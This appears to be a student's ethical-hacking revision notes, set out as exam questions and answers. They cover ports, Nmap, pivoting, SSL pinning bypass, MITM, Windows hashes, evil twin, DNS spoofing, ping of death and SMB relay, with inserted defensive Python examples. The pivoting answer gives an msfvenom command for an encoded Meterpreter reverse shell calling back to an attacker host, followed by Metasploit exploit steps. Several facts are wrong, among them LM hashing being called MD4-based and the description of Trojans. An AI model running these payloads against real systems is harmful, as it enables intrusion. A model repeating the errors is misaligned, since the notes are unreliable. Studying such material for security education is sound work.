Unit 1

1. What are the common ports? Give a list of any 5 common ports with names of services running and the type of attacks that can be performed.

1. FTP (20, 21)
FTP stands for File Transfer Protocol. Ports 20 and 21 are solely TCP ports used to allow users to send files to and receive files from a server on their personal computers. The FTP port is insecure and outdated and can be exploited using: anonymous authentication (you can log into the FTP port with both username and password set to "anonymous"), cross-site scripting, brute-forcing passwords, and directory traversal attacks.

2. SSH (22)
SSH stands for Secure Shell. It is a TCP port used to ensure secure remote access to servers. You can exploit the SSH port by brute-forcing SSH credentials or using a private key to gain access to the target system.

3. SMB (139, 137, 445)
SMB stands for Server Message Block. It is a communication protocol created by Microsoft to provide shared access to files and printers across a network. When enumerating the SMB port, find the SMB version, and then you can search for an exploit on the internet, Searchsploit, or Metasploit. The SMB port could be exploited using the EternalBlue vulnerability, brute-forcing SMB login credentials, exploiting the SMB port using NTLM capture, and connecting to SMB using PsExec. An example of an SMB vulnerability is the WannaCry vulnerability, which runs on EternalBlue.

4. DNS (53)
DNS stands for Domain Name System. It is both a TCP and UDP port, used for transfers and queries respectively. One common exploit on the DNS ports is the Distributed Denial of Service (DDoS) attack.

5. HTTP / HTTPS (443, 80, 8080, 8443)
HTTP stands for HyperText Transfer Protocol, while HTTPS stands for HyperText Transfer Protocol Secure (which is the more secure version of HTTP). These are the most popular and widely used protocols on the internet, and as such are prone to many vulnerabilities. They are vulnerable to SQL injection, cross-site scripting, cross-site request forgery, etc.

6. Telnet (23)
The Telnet protocol is a TCP protocol that enables a user to connect to remote computers over the internet. The Telnet port has long been replaced by SSH, but it is still used by some websites today. It is outdated, insecure, and vulnerable to malware. Telnet is vulnerable to spoofing, credential sniffing, and credential brute-forcing.

7. SMTP (25)
SMTP stands for Simple Mail Transfer Protocol. It is a TCP port used for sending and receiving mail. It can be vulnerable to mail spamming and spoofing if not well secured.

2. Explain the client & server mechanism.

The client-server model is a distributed application structure that partitions tasks or workload between the providers of a resource or service, called servers, and service requesters, called clients. In the client-server architecture, when the client computer sends a request for data to the server through the internet, the server accepts the request, processes it and delivers the requested data packets back to the client. Clients do not share any of their resources. Examples of the client-server model are email, the World Wide Web, etc.

How the client-server model works
In this article we are going to take a dive into the client-server model and have a look at how the internet works via web browsers. This article will help us in having a solid foundation of the web and help in working with web technologies with ease.
• Client: When we use the word client, we mean a person or an organization using a particular service. Similarly, in the digital world a client is a computer (host) that is capable of receiving information or using a particular service from the service providers (servers).
• Servers: Similarly, when we use the word servers, we mean a person or medium that serves something. In the digital world a server is a remote computer which provides information (data) or access to particular services.

3. What is nmap? Explain the Aggressive Detection command in Nmap.

• Nmap is short for Network Mapper. It is an open-source Linux command-line tool that is used to scan IP addresses and ports in a network and to detect installed applications.
• Nmap allows network admins to find which devices are running on their network, discover open ports and services, and detect vulnerabilities.
• Most of its functions are based on using IP packet analysis to detect and identify remote hosts, operating systems and services.
• Nmap is used by large companies as well as smaller-sized organizations for port auditing, host monitoring, penetration testing and similar tasks.
• Even with Nmap constantly being updated with new features for decades, its core function remains that of a port scanner, helping users gather data by sending packets to local or remote ports. This is done by waiting for packet responses to determine if ports are closed, open or filtered.
• Nmap has a special flag to activate aggressive detection, namely -A.
• Aggressive mode enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute). This mode sends a lot more probes and is more likely to be detected, but it provides a lot of valuable host information.
• Aggressive scans provide far better information than regular scans.

4. Explain buffer overflow attack with its types and impact on the system.

• Buffer overflows can affect all types of software. They typically result from malformed inputs or failure to allocate enough space for the buffer.
• If the transaction overwrites executable code, it can cause the program to behave unpredictably and generate incorrect results, memory access errors, or crashes.
• Attackers exploit buffer overflow issues by overwriting the memory of an application.
• This changes the execution path of the program, triggering a response that damages files or exposes private information.
• For example, an attacker may introduce extra code, sending new instructions to the application to gain access to IT systems.
• If attackers know the memory layout of a program, they can intentionally feed input that the buffer cannot store, and overwrite areas that hold executable code, replacing it with their own code.

Types of Buffer Overflow Attacks

Stack based buffer overflow
• Stack-based buffer overflows are more common, and leverage stack memory that only exists during the execution time of a function.
• The stack is a continuous space in memory used to organize data associated with function calls, including function parameters, function local variables and management information, such as frame and instruction pointers.

Heap based attack
• Heap-based attacks are harder to carry out and involve flooding the memory space allocated for a program beyond the memory used for current runtime operations.
• The heap is a memory structure used to manage dynamic memory.
• Programmers often use the heap to allocate memory whose size is not known at compile time, where the amount of memory required is too large to fit on the stack, or where the memory is intended to be used across function calls.

5. Explain pivoting with one practical example.

Pivoting is a technique that Metasploit uses to route the traffic from a hacked computer toward other networks that are not accessible by the hacker's machine. Consider:
• A network with the range 192.168.1.0/24 where the hacker machine has access, and
• Another network with the range 10.10.10.0/24. It is an internal network and the hacker doesn't have access to it.
The hacker will try to hack the second network through a machine that has access to both networks, and use it to exploit and hack other internal machines.
In this scenario, a hacker will first break into the first network and then use it as a staging point to exploit and hack the internal machines of the second network. This process is known as pivoting because the hacker is using the first network as a pivot to get access into the second network.

Practical example (Metasploit):
• msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 4 LHOST=192.168.5.243 LPORT=4444 --bad-char '\x00\x0a\x0d\x04\xa1' -f exe -o /root/adi.exe
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.5.243
• getuid
• run autoroute -s 192.168.5.1/24
• run autoroute -p
• Search for the port scan module and use the TCP port scan auxiliary module.
• Set the port range to 20-25.
• Search for the FTP version module.
• Set RHOSTS 192.168.5.70 and run.
• Search vsftpd 2.3.4.
• Set RHOST 192.168.5.70 and start the exploit. It will open a shell. Confirm that the exploited system is Metasploitable using uname -a.

UNIT – II

1. What is apk signing? Why it is required?
Ans. Application signing allows developers to identify the author of the application and to update their application without creating complicated interfaces and permissions. Every application that is run on the Android platform must be signed by the developer. Applications that attempt to install without being signed will be rejected by either Google Play or the package installer on the Android device.

On Google Play, application signing bridges the trust Google has with the developer and the trust the developer has with their application. Developers know their application is provided, unmodified, to the Android device, and developers can be held accountable for the behavior of their application.

On Android, application signing is the first step to placing an application in its Application Sandbox. The signed application certificate defines which user ID is associated with which application; different applications run under different user IDs. Application signing ensures that one application cannot access any other application except through well-defined IPC.

When an application (APK file) is installed onto an Android device, the Package Manager verifies that the APK has been properly signed with the certificate included in that APK. If the certificate (or, more accurately, the public key in the certificate) matches the key used to sign any other APK on the device, the new APK has the option to specify in the manifest that it will share a UID with the other similarly-signed APKs.

Applications can be signed by a third party (OEM, operator, alternative market) or self-signed. Android provides code signing using self-signed certificates that developers can generate without external assistance or permission. Applications do not have to be signed by a central authority. Android currently does not perform CA verification for application certificates.

Applications are also able to declare security permissions at the Signature protection level, restricting access only to applications signed with the same key while maintaining distinct UIDs and Application Sandboxes. A closer relationship with a shared Application Sandbox is allowed via the shared UID feature, where two or more applications signed with the same developer key can declare a shared UID in their manifest.

2. What is SSL pinning in apk? How would you bypass it?

Ans. SSL pinning is a mechanism that enables the user to identify a server based on an SSL certificate stamp embedded into the app. This makes Man-in-the-Middle attacks almost impossible and prevents the interception of the data traffic between a client and a server.

At the same time, this mechanism complicates the application analysis during penetration testing involving black-box or grey-box methods, because the pentester has to identify this mechanism and implement some workaround to intercept the traffic and analyze the client–server interaction. This article describes one of the ways to overcome SSL pinning in Android apps.

How would you bypass it?
Technique – Overwrite Packaged CA Certificate with Custom CA Certificate

What if you successfully install your certificate into the user-added CA store, the application is targeting Android 6.0, and your certificate shows up as valid when you try to browse other SSL-protected resources, but the application still dies with SSL errors? It's possible that the developers have taken additional steps to restrict the set of CAs trusted by the application. Recall from technique 1 that we defined a custom trust anchor and provided a path to a CA certificate – this is intended functionality that may be used by developers to attempt to protect their application from SSL interception.

If a custom certificate chain is being distributed with an application, extracting the APK and overwriting the provided CA with our custom CA should be enough to cause our intercepting certificate to be trusted. Note that in some cases, additional verification of the trust chain may be happening, so this method may yield mixed results.
Opening the APK with a tool such as APK Studio makes the presence of certificates bundled with the deployed application obvious. In the image above, the certificates are located under the 'assets' directory. Overwriting the aptly-named 'UniversalRootCA' certificate with our custom CA should allow us to trick the application into accepting our certificate.

3. What is MITM attack? Give one example

Ans. A man-in-the-middle attack represents a cyberattack in which a malicious player inserts himself into a conversation between two parties, impersonates both of them, and gains access to the information that the two parties were trying to share. The malicious player intercepts, sends, and receives data meant for someone else – or not meant to be sent at all – without either outside party knowing until it's already too late.

Examples –

➢ IP SPOOFING
The Internet Protocol (IP) address refers to a numerical label that is assigned to each device that connects to a computer network that uses the Internet Protocol for communication. IP addresses have two main functions: host or network interface identification and location addressing.

➢ HTTPS SPOOFING
The HyperText Transfer Protocol (HTTP) represents the foundation of data communication for the World Wide Web, hypertext documents including hyperlinks to other resources that users can access.

➢ DNS SPOOFING
The Domain Name System (DNS) is a hierarchical and decentralized naming system for computers, services, or other resources that are connected to the Internet, which translates more readily memorized domain names to the numerical IP addresses needed for localization and identification.

➢ SSL HIJACKING
SSL stands for Secure Sockets Layer and is a type of protocol that establishes encrypted links between your browser and the web server. When you connect to a secure server (guaranteed by HTTPS), you expect standard security protocols to be in place, protecting whatever data is shared between it and your devices.

➢ EMAIL HIJACKING
E-mail hijacking is a type of man-in-the-middle attack used by cybercriminals to target the email accounts of banks or other financial institutions. After they obtain access, all the transactions between an institution and its clients can be supervised.
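For the DNS spoofing entry above, an added example that is not part of the original notes: the basic checks a stub resolver applies to an incoming reply before it trusts the address in it (the reply must echo the query's transaction ID, be marked as a response, repeat the question exactly and only answer for the name that was asked). Message building and parsing follow the DNS wire format; the transaction IDs, names and addresses are constructed for the demonstration.

```python
import struct

# Constructed example: the sanity checks a resolver applies to a DNS reply
# before caching it. A forged reply that fails any of them is dropped.

def encode_name(name: str) -> bytes:
    """Encode a dotted name as length-prefixed DNS labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def build_query(txid: int, name: str) -> bytes:
    """Standard A query: header (RD=1, QDCOUNT=1) followed by one question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN

def build_reply(txid: int, qname: str, ip: str, ttl: int = 300) -> bytes:
    """Reply with one A record; used here to construct both genuine and forged replies."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)     # QR=1 RD=1 RA=1 RCODE=0
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    rdata = bytes(int(octet) for octet in ip.split("."))
    # the answer NAME is a compression pointer (0xC00C) back to the question name at offset 12
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer

def decode_name(msg: bytes, off: int):
    """Decode a possibly compressed name; returns (name, offset just after the field)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # compression pointer
            if end is None:
                end = off + 2                          # the pointer ends this field
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)

def validate_reply(query: bytes, reply: bytes):
    """Return (accepted, reason, answers); answers is a list of (name, ip, ttl)."""
    if len(reply) < 12:
        return False, "truncated header", []
    qid = struct.unpack("!H", query[:2])[0]
    rid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", reply[:12])
    if rid != qid:                       # the reply must echo the ID we chose
        return False, "transaction id mismatch", []
    if not flags & 0x8000:               # QR bit: must be a response, not another query
        return False, "not a response", []
    if flags & 0x000F:                   # RCODE must be NOERROR
        return False, "rcode %d" % (flags & 0x000F), []
    if qdcount != 1:
        return False, "unexpected question count", []
    qname, qend = decode_name(query, 12)
    rname, rend = decode_name(reply, 12)
    # the echoed question (name, type, class) must match what we asked
    if rname.lower() != qname.lower() or reply[rend:rend + 4] != query[qend:qend + 4]:
        return False, "question does not match query", []
    answers, off = [], rend + 4
    for _ in range(ancount):
        name, off = decode_name(reply, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", reply[off:off + 10])
        off += 10
        rdata = reply[off:off + rdlen]
        off += rdlen
        if name.lower() != qname.lower():    # only accept records for the name we asked about
            return False, "answer for a different name", []
        if rtype == 1 and rclass == 1 and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata), ttl))
    return True, "ok", answers

def demo():
    """Constructed exchange: one genuine reply and one forged reply whose ID was guessed wrong."""
    txid = 0x1234                        # a real resolver picks this (and the source port) at random
    query = build_query(txid, "example.test")
    genuine = build_reply(txid, "example.test", "192.0.2.10")
    forged = build_reply(0x4321, "example.test", "198.51.100.9")
    return validate_reply(query, genuine), validate_reply(query, forged)

if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

A forged reply that does guess the ID correctly still passes these checks, which is why resolvers also randomize the source port and why DNSSEC validation exists.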
4. Provide differences between Firewall, IDS & IPS.

5. Briefly explain traceroute and ping, and the types of information we can gather?

Ping: It is a utility that helps one to check if a particular IP address is accessible or not. Ping works by sending a packet to the specified address and waiting for a reply. It also measures round-trip time and reports errors.
Ping is also used in checking if the computers on a local network are active. For this, the user has to go to the command prompt and type: ping 127.0.0.1, and if the address is active, ping would return a message like this:
Pinging 127.0.0.1 with 32 bytes of data
Reply from 127.0.0.1: bytes=32 time<10ms TTL=32
Reply from 127.0.0.1: bytes=32 time<10ms TTL=32
Reply from 127.0.0.1: bytes=32 time<10ms TTL=32
Reply from 127.0.0.1: bytes=32 time<10ms TTL=32
The IP address 127.0.0.1 is the address of the local host and would receive a ping reply even if the sender is not connected to the internet.

Traceroute: It is a utility that traces a packet from your computer to the host, and will also show the number of steps (hops) required to reach there, along with the time taken by each step. Traceroute works by sending packets of data with a low survival time (Time to Live – TTL), which specifies how many steps (hops) the packet can survive before it is returned. When a packet can't reach the final destination and expires at an intermediate step, that node returns the packet and identifies itself. So, by increasing the TTL gradually, traceroute is able to identify the intermediate hosts. If any of the hops come back with "Request timed out", it denotes network congestion and a reason for slow-loading web pages and dropped connections.

The main difference between ping and traceroute is that ping is a quick and easy utility to tell if the specified server is reachable and how long it will take to send and receive data from the server, whereas traceroute finds the exact route taken to reach the server and the time taken by each step (hop).
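An added example (not code from the original notes) that models the TTL mechanism described above: each router on a constructed path decrements the TTL, and the one at which it reaches zero identifies itself, so raising the TTL one step at a time reveals the route; the same probe with a large TTL is what ping relies on. The path, addresses and delays are constructed; a hop that never answers shows where "Request timed out" comes from (a router or firewall that drops the expired probe produces the same symptom as congestion).

```python
from dataclasses import dataclass

# Constructed model of the TTL mechanism behind traceroute and ping.
# Each Hop is a router (or the final host) with a one-way delay; a hop that
# does not reply models the "Request timed out" line from the notes.

@dataclass
class Hop:
    address: str
    delay_ms: float
    replies: bool = True          # False: drops the probe silently (no ICMP Time Exceeded)
    is_destination: bool = False  # True for the target host at the end of the path

def send_probe(path, ttl):
    """Forward one probe along `path` with the given TTL.
    Returns (kind, responder, rtt_ms) where kind is 'echo-reply',
    'time-exceeded' or 'lost'; responder is None when nobody answered."""
    elapsed = 0.0
    for hop in path:
        elapsed += hop.delay_ms
        if hop.is_destination:            # delivered: the host answers the echo request
            if hop.replies:
                return "echo-reply", hop.address, elapsed * 2
            return "lost", None, elapsed * 2
        ttl -= 1                          # every router decrements TTL before forwarding
        if ttl == 0:                      # expired here: the router reports itself (or stays silent)
            return "time-exceeded", hop.address if hop.replies else None, elapsed * 2
    return "lost", None, elapsed * 2

def ping(path, ttl=64):
    """Ping sends with a large TTL and only cares whether the destination answered and how fast."""
    kind, responder, rtt = send_probe(path, ttl)
    return (responder, rtt) if kind == "echo-reply" else (None, None)

def traceroute(path, max_hops=30):
    """Raise the TTL one step at a time; each expiry reveals one intermediate hop."""
    rows = []
    for ttl in range(1, max_hops + 1):
        kind, responder, rtt = send_probe(path, ttl)
        rows.append((ttl, responder or "Request timed out", rtt))
        if kind == "echo-reply":          # destination reached: stop probing
            break
    return rows

# Constructed path: two routers that answer, one silent hop, then the target host.
SAMPLE_PATH = [
    Hop("192.0.2.1", 1.0),
    Hop("198.51.100.1", 5.0),
    Hop("203.0.113.7", 8.0, replies=False),
    Hop("203.0.113.42", 12.0, is_destination=True),
]

if __name__ == "__main__":
    print("ping:", ping(SAMPLE_PATH))
    for ttl, responder, rtt in traceroute(SAMPLE_PATH):
        print(f"{ttl:2d}  {responder:<20} {rtt:.1f} ms")
```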
6. What is malware? Explain types of malware.

MALWARE –
➢ Malware is a program designed to gain access to computer systems, normally for the benefit of some third party, without the user's permission.
➢ Malware includes computer viruses, worms, Trojan horses, ransomware, spyware and other malicious programs.

Types of Malware –
➢ VIRUSES
➢ WORMS
Worms replicate themselves on the system, attaching themselves to different files and looking for pathways between computers, such as a computer network that shares common file storage areas.
➢ SPYWARE
Its purpose is to steal private information from a computer system for a third party. Spyware collects information and sends it to the hacker.
➢ TROJAN HORSE
A Trojan horse differs from a virus because the Trojan binds itself to non-executable files, such as image files and audio files.
➢ LOGIC BOMBS
A logic bomb is a malicious program that uses a trigger to activate the malicious code. The logic bomb remains non-functioning until that trigger event happens. Once triggered, a logic bomb implements a malicious code that causes harm to a computer.
➢ RANSOMWARE
Ransomware holds a computer system, or the data it contains, until the victim makes a payment. Ransomware encrypts the data on the computer with a key which is unknown to the user.
➢ BACKDOORS
A backdoor bypasses the usual authentication used to access a system. The purpose of the backdoor is to grant the cybercriminals future access to the system even if the organization fixes the original vulnerability used to attack the system.
➢ ROOTKITS
A rootkit modifies the OS to make a backdoor. Attackers then use the backdoor to access the computer remotely. Most rootkits take advantage of software vulnerabilities to modify system files.
➢ KEYLOGGERS
A keylogger records everything the user types on his/her computer system to obtain passwords and other sensitive information and send them to the source of the keylogging program.

Unit 3

1. What are the file inclusion vulnerabilities? Explain with its types.

• File inclusion vulnerabilities often affect web applications that rely on a scripting runtime and occur when a web application allows users to submit input into files or upload files to the server. They are often found in poorly written applications.
• File inclusion vulnerabilities allow an attacker to read and sometimes execute files on the victim server or, as is the case with Remote File Inclusion, to execute code hosted on the attacker's machine.
• An attacker may use remote code execution to create a web shell on the server and use that web shell for website defacement.
Types
• File inclusion vulnerabilities come in two types, depending on the origin of the included file:

I. Local File Inclusion (LFI)
- An LFI vulnerability allows attackers to access or execute files hosted locally on the application server.
- This is possible in applications that allow the path to a file on the server to be used as user input and do not sanitize such input.
- These attacks typically occur when an application uses the path to a file as input.
- If the application treats that input as trusted, an attacker can use the local file in an include statement.
- While Local File Inclusion and Remote File Inclusion are very similar, an attacker using LFI may include only local files.

II. Remote File Inclusion (RFI)
- The remote file inclusion (RFI) vulnerability is made possible by applications that dynamically reference external files or scripts without proper sanitization.
- By exploiting the vulnerability, an attacker forces the server to download and execute arbitrary files that are located remotely, which can open backdoor shells.
- These can lead to data being stolen or damaged, websites being defaced and having malware installed, or a full-server compromise and takeover.
- The results of a successful RFI attack can be information theft, a compromised server, and a site takeover, resulting in content modification.
- To minimize the risk of RFI attacks, proper input validation and sanitization must be implemented.

2. What is UAC in Windows? Why do you need to bypass the UAC in Windows?

• User Account Control, or UAC for short, is a security feature of Windows which helps prevent unauthorized changes to the operating system.
• These changes can be initiated by applications, users, viruses or other forms of malware.
• User Account Control makes sure certain changes are made only with approval from the administrator.
• If the changes are not approved by the administrator, they are not executed, and Windows remains unchanged. It is as if nothing happened.
• UAC was first made available in Windows Vista, and since then it has been improved with each new version of Windows.
• When you double-click on a file, a setting or an app that is about to make important changes to Windows, you are shown a User Account Control (UAC) prompt.
• The UAC prompt displays the name of the program that is about to make a system change that requires the approval of an administrator, the publisher of that program and the file origin.

3. Briefly explain the authentication mechanism and hashes of Microsoft Windows.

Windows authentication
• Windows-based authentication is handled between the Windows server and the client machine.
• ASP.NET applications reside in Internet Information Server (IIS). Any user's web request goes directly to the IIS server, and it provides the authentication process in a Windows-based authentication model.
• This type of authentication is quite useful in an intranet environment in which users are asked to log into a network.
• In this scenario, you can utilize the credentials that are already in place for the authentication and authorization process. This authentication is done by IIS.
• It first accepts the user's credentials from the domain login "Domain\UserName and Password". If this process fails, then IIS displays an error and asks to re-enter the login information.
• The following are the advantages of Windows Authentication:
- It relies on and allows the user to use existing Windows accounts.
- Establishes the foundation for a uniform authentication model for multiple types of applications.
- For developers it is easy to implement.
• The following are the disadvantages of Windows Authentication:
- Applicable to Microsoft platforms only.
- No custom control over this platform-provided authentication process.

Hashes
➢ LM
- The LM hash is used for storing passwords.
- It is disabled in Windows 7 and above.
- However, LM is enabled in memory if the password is less than 15 characters.
- That's why all recommendations for admin accounts are 15+ characters.
- LM is old, based on MD4 and easy to crack.
- The reason is that Windows domains require speed, but that also makes for weak security.
➢ NT
- The NT hash calculates the hash based on the entire password the user entered.
- The LM hash splits the password into two 7-character chunks, padding as necessary.
➢ NTLM
- The NTLM hash is used for local authentication on hosts in the domain.
- It is a combination of the LM and NT hash as seen above.
- This is the way passwords are stored on modern Windows systems, and they can be obtained by dumping the SAM database, or using Mimikatz.
- They are also stored on domain controllers in the NTDS file.
- These are the hashes you can use to pass-the-hash.
- These use the NT hash in the algorithm, which means it can be used to recover the password through brute-force/dictionary attacks.

4. What is Active Directory and a domain controller? What is the purpose of a domain controller in Active Directory?

Active Directory
▪ A directory service produced by Microsoft for Windows domain networks is known as Active Directory, whereas a server that responds to authentication security requests, such as checking permissions, logging in, etc., for the Windows domain is known as a domain controller.
▪ Active Directory comprises various services that work on Windows Server and manage access and permissions to the networked resources. It is a product developed by Microsoft.
▪ It stores the data in the form of objects. These objects are single elements such as a group, user, device or application.
▪ The categorization of the objects is done by the attributes and name, which include the information related to the user, for example, secure shell keys and passwords.
▪ Domain Services is the main service of Active Directory; it holds the directory information and handles communication between the users and the domain.
▪ The main function of Active Directory is to store information regarding all the resources and users in an organized and well-planned manner.

Domain Controller
▪ A server that responds to verification requests and confirms the users on the computer network is known as a domain controller.
▪ It helps to organize the computers and users that work simultaneously on a network in a hierarchical way.
▪ The controller helps to retain all the data in an organized manner and also keep it secure. The domain controller (DC) is considered the key to Active Directory (AD).
▪ Attackers are aware of all the tricks used to fetch the data, including the DC itself.
▪ Though you may not be able to protect your DCs from attackers, these DCs can help to find out about cyber-attacks.
▪ The primary function of the DC is to validate and authenticate the users that have access on the network.
▪ They are responsible for checking the username, password and other credentials, and they have the right to allow or deny the user who is trying to access.

Purpose of Active Directory in the domain controller
• Domain control is a function of Microsoft's Active Directory, and domain controllers are servers that can use Active Directory to respond to authentication requests.
• Active Directory is a type of domain, and a domain controller is an important server on that domain.
• The primary responsibility of the DC is to authenticate and validate user access on the network. When users log into their domain, the DC checks their username, password, and other credentials to either allow or deny access for that user.

Unit 04

1. Illustrate evil-twin attack.

Evil twin attacks are a type of Man in the Middle (MitM) attack in which a fake Wi-Fi network is set up to steal information or further infiltrate a connecting device.
This is often done in public settings where people are most likely to look for or connect to freely available Wi-Fi. This can be in airports, cafes, large public parks, etc., but hackers can really leverage this attack anywhere, mainly because the fake Wi-Fi can be easily set up and deployed.

How an evil twin attack affects you
If successful, a hacker has essentially intercepted your internet connection, connecting you to them. This can mean the hacker can steal your login information, see sensitive details and info from the websites you visit, and even redirect certain commands and tasks.

How does an evil twin attack work?
Step one: Evil twin Wi-Fi setup
First, a hacker situates themselves in a prime location where people are looking to connect to free Wi-Fi networks.
Using a device like a hotspot or Wi-Fi Pineapple, they can set up their own Wi-Fi network. Using a tool like hostapd-wpe, they can impersonate any network and, given enough time, even obtain the network credentials.
To impersonate an existing connection, they'll likely use the same SSID (the name of the network) as the one that already exists.
Step two: Captive portal setup
The captive portal is usually the separate web page or initial pop-up after connecting to a Wi-Fi network. Most often, it asks you for some details before letting you access the internet.
A tool like dnsmasq can be used to create captive portals and spoof DNS servers to increase the semblance of legitimacy.
Step three: Push victims to connect to the evil twin Wi-Fi connection
At this point, unsuspecting victims looking to connect to Wi-Fi will probably see two different connections with the same name. To increase their odds of success, they can physically move the hotspot or Wi-Fi-emitting device closer to the victims, so the connection appears first and is stronger than the real connection. They can also flood the original connection with a denial of service (DoS) attack.
Step four: Individual, device & organizational compromise
Once the victim connects to the network, they're shown the fake captive portal, which can be the beginning of data theft. Because the hacker can now monitor your connection, they can log keystrokes and see your activity as you browse the internet. Hackers can deploy packet injections that can replace content on the site a victim is navigating to (for example, to direct them to a malicious website), or payloads (in the form of malicious code, ransomware, or malware) can be deployed within downloaded files, without the victim ever knowing.

2. How would you perform DNS Spoofing attack?

▪ A Domain Name System (DNS) converts a human-readable name to a numeric IP address.
▪ There is not only one DNS server. There is a series of DNS servers used to resolve the domain name. DNS uses a cache to work efficiently, so that it can quickly refer to DNS lookups it has already performed rather than performing a DNS lookup over and over again.
▪ DNS spoofing means getting a wrong entry or IP address for the requested site from the DNS server. Attackers find out the flaws in the DNS system, take control, and redirect users to a malicious website.
In the above image –
1. Request to Real Website: The user sends a request for a particular website; it goes to the DNS server to resolve the IP address of that website.
2. Inject Fake DNS Entry: Hackers have already taken control over the DNS server by detecting its flaws, and now they add false entries to the DNS server.
3. Resolve to Fake Website: The fake entry in the DNS server redirects the user to the wrong website.

3. Illustrate ping of death attack.

Ping of Death (a.k.a. PoD) is a type of Denial of Service (DoS) attack in which an attacker attempts to crash, destabilize, or freeze the targeted computer or service by sending malformed or oversized packets using a simple ping command.
PoD attacks exploit legacy weaknesses which may have been patched in target systems. However, on unpatched systems the attack is still relevant and dangerous. Recently, a new type of PoD attack has become popular. In this attack, commonly known as a ping flood, the targeted system is hit with ICMP packets sent rapidly via ping without waiting for replies.

Attack description
The maximum size of a correctly formed IPv4 packet, including the IP header, is 65,535 bytes, while a normal ping carries a total payload of 84 bytes. Many historical computer systems simply could not handle larger packets, and would crash if they received one. This bug was easily exploited in early TCP/IP implementations in a wide range of operating systems including Windows, Mac, Unix, Linux, as well as network devices like printers and routers.
Since sending a ping packet larger than 65,535 bytes violates the Internet Protocol, attackers would generally send malformed packets in fragments. When the target system attempts to reassemble the fragments and ends up with an oversized packet, a memory overflow could occur and lead to various system problems, including a crash.
Ping of Death attacks were particularly effective because the attacker's identity could be easily spoofed. Moreover, a Ping of Death attacker would need no detailed knowledge of the machine he/she was attacking, except for its IP address.
It is worth noting that this vulnerability, though best recognized for its exploitation by PoD attacks, can actually be exploited by anything that sends an IP datagram – ICMP echo, TCP, UDP and IPX.

4. What is SMB relay attack?

An SMB relay attack is a type of attack which relies on NTLM version 2 authentication, which is normally used in most companies.
Unfortunately, when we are listening to what is going on in the network, we're able to capture a certain part of the traffic related to the authentication and also relay it to other servers.
This kind of attack is very dangerous because anybody with access to the network can capture traffic, relay it, and get unauthorized access to the servers.

How does an SMB Relay Attack happen?
▪ The SMB relay attack abuses the NTLM challenge-response protocol. Commonly, all SMB sessions used the NTLM protocol for encryption and authentication purposes (i.e. NTLM over SMB). However, most sysadmins switched to KILE over SMB after research proved that the first version of NTLM is susceptible to Man-in-the-Middle attacks, the SMB relay attack counting among them.
▪ Now, in normal client-server communication, there is a series of requests followed by responses. The idea behind an SMB relay attack is to position yourself between the client and the server in order to capture the data packets transmitted between the two entities.

Attack steps
Step 1. Scanning the network. A tool like Nmap is used to scan the network for shares and IP addresses. Alternatively, you can use Metasploit to quickly map out network shares.
Step 2. Using Metasploit or a similar tool to conduct the attack. Remember that the purpose of this endeavor is to capture and 'listen' to enough auth packets in order to trick the server into believing that the attacker is actually the user.
Step 3. If the server is running NTLM version 2.0, you would need to approach this differently, and that way would be Impacket (i.e. a collection of network protocols).
Step 4. The payload is created with msfvenom. After that, we can use Metasploit to commence the Meterpreter session. Be warned – your payload is doomed to fail if the target machine doesn't have administrator rights to the duped server.
Step 5. Once the payload is delivered, you would have gained access to the shell. That's it! You're in and can do whatever you want (or not).
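An added example for the Ping of Death section above (it is not code from the original notes): an IPv4 fragment reassembler in the two variants the text contrasts, the historic one that trusts offset + length and so ends up holding more than 65,535 bytes, and the hardened one that rejects any fragment ending past that limit before writing it. It also does the hole check a real reassembler needs. Fragment offsets are in 8-byte units as in the IP header; the payloads and chunk size are constructed.

```python
# Constructed example: IPv4 fragment reassembly with and without the size
# check. Offsets are in 8-byte units as in the IP header; payloads are bytes.

MAX_DATAGRAM = 65535   # the IPv4 "total length" field is 16 bits, so this is the legal maximum
FRAG_UNIT = 8          # the fragment offset field counts 8-byte blocks

def make_fragments(payload: bytes, chunk_size: int = 1480):
    """Split a payload into (offset_units, chunk, more_fragments) the way a
    sender fragments a datagram for a link that carries 1480 payload bytes."""
    assert chunk_size % FRAG_UNIT == 0
    frags = []
    for start in range(0, len(payload), chunk_size):
        chunk = payload[start:start + chunk_size]
        frags.append((start // FRAG_UNIT, chunk, start + chunk_size < len(payload)))
    return frags

def reassemble(fragments, check_bounds: bool = True) -> bytes:
    """Rebuild one datagram from its fragments.

    check_bounds=False reproduces the historic bug: offset + length is never
    compared with MAX_DATAGRAM, so a final fragment placed past the limit
    silently grows the buffer (a fixed 65,535-byte C buffer would be overrun).
    check_bounds=True rejects such a fragment before anything is written."""
    buf = bytearray()
    received = []          # (start, end) ranges, for the hole check
    total = None
    for offset_units, chunk, more in fragments:
        start = offset_units * FRAG_UNIT
        end = start + len(chunk)
        if check_bounds and end > MAX_DATAGRAM:
            raise ValueError("fragment ends at byte %d, past the %d-byte IPv4 limit" % (end, MAX_DATAGRAM))
        if end > len(buf):
            buf.extend(bytes(end - len(buf)))
        buf[start:end] = chunk
        received.append((start, end))
        if not more:
            total = end    # the fragment with MF=0 fixes the datagram length
    if total is None:
        raise ValueError("final fragment (MF=0) never arrived")
    covered = 0            # the received ranges must tile [0, total) with no gaps
    for start, end in sorted(received):
        if start > covered:
            raise ValueError("hole at byte %d" % covered)
        covered = max(covered, end)
    return bytes(buf[:total])

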